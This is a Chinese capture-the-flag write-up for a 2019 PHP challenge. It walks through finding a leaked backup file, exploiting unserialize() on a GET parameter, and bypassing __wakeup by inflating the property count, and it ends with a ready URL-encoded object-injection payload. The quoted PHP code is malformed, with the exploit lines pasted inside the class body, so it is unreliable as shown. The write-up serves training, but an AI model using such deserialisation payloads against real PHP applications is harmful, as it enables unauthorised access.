[极客大挑战 2019] PHP

扫描网站目录,发现备份文件,www.zip

在 index.php 中 发现反序列化。

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

构造反序列化字符串,让 username = admin pass=100,由于 private 变量,在反序列化时会参数不可见字符,所以进行一下 url 编码。

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'admin';
    private $password = 100;

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
    
    $a = new Name();
    echo urlencode(serialize($a));
?>

}
?>

使类的参数超过实际的参数,可以绕过__wakeup 方法。

最终 payload:

?select=O%3A4%3A%22Name%22%3A4%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝